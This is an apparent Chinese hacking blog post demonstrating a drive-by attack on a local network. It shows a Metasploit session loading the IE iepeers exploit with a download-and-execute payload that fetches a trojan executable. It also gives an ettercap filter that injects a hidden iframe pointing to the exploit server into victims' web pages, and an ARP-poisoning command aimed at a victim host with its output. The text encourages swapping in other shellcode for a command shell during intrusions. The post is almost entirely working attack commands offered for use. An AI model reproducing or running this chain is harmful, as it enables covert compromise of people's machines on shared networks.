文章作者：Kindle
以下只是简单演示，在渗透过程中可以修改filter脚本，可根据需要换其他的shellcode，比如直接获取cmdshell。。。
           888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 “888 “88bd8P Y8b888       “88b88K     888 “88b888d88″”88b888888
888 888 88888888888888   .d888888″Y8888b.888 888888888 888888888
888 888 888Y8b.    Y88b. 888 888     X88888 d88P888Y88..88P888Y88b.
888 888 888 “Y8888 “Y888″Y888888 88888P’88888P” 888 “Y88P” 888 “Y888
                                           888
                                           888
                                           888
       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ — –=[ 533 exploits - 254 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
       =[ svn r8832 updated today (2010.03.16)

msf > use exploit/windows/browser/ie_iepeers_pointer
msf exploit(ie_iepeers_pointer) > set payload windows/download_exec
payload => windows/download_exec
msf exploit(ie_iepeers_pointer) > set SRVHOST 192.168.1.110
SRVHOST => 192.168.1.110
msf exploit(ie_iepeers_pointer) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(ie_iepeers_pointer) > set url http://192.168.102:99/muma.exe
url => http://192.168.102:99/muma.exe
msf exploit(ie_iepeers_pointer) > exploit

Exploit running as background job.
msf exploit(ie_iepeers_pointer) >

Using URL: http://192.168.1.110:8080/jG8gyIWoChq

Server started.

root@bt:~# cat kindle.filter
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data,”Accept-Encoding”)) {
replace(“Accept-Encoding”,”Accept-Mousecat”);
msg(“zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“</body>”,”<iframe src=\”http://192.168.1.110:8080/jG8gyIWoChq\” width=0 height=0></iframe> </body>”);
msg(“Filter Ran.\n”);
}
root@bt:~# etterfilter kindle.filter -o demo.ef

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file ‘kindle.filter’ done.

Unfolding the meta-tree done.

Converting labels to real offsets done.

Writing output to ‘demo.ef’ done.

-> Script encoded into 15 instructions.
root@bt:~# ettercap -T -q -M arp /192.168.1.102/ -F demo.ef //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from demo.ef…
Listening on eth0… (Ethernet)

eth0 ->       00:0C:29:F1:10:73     192.168.1.110     255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
* |==================================================>| 100.00 %

3 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : 192.168.1.102 00:22:64:84:CE:8D

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…
Text only Interface activated…
Hit ‘h’ for inline help

Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
zapped Accept-Encoding!
Filter Ran.
Filter Ran.
Filter Ran.
zapped Accept-Encoding!
打开ie浏览器，访问9ku.com或者任意存在body标签的页面都被替换成了我们的网马，中招的电脑会在msf里显示
msf exploit(ie_iepeers_pointer) >

Using URL: http://192.168.1.110:8080/jG8gyIWoChq

Server started.

Sending Internet Explorer iepeers.dll Use After Free to 192.168.1.102:4272…

在线演示地址:
Exploit iepeers vul whith ettercap（上集）
http://www.linux520.com/viewthread.php?tid=457
c4rp3nt3r作品：Exploit iepeers vul whith ettercap（下集）
http://www.linux520.com/viewthread.php?tid=459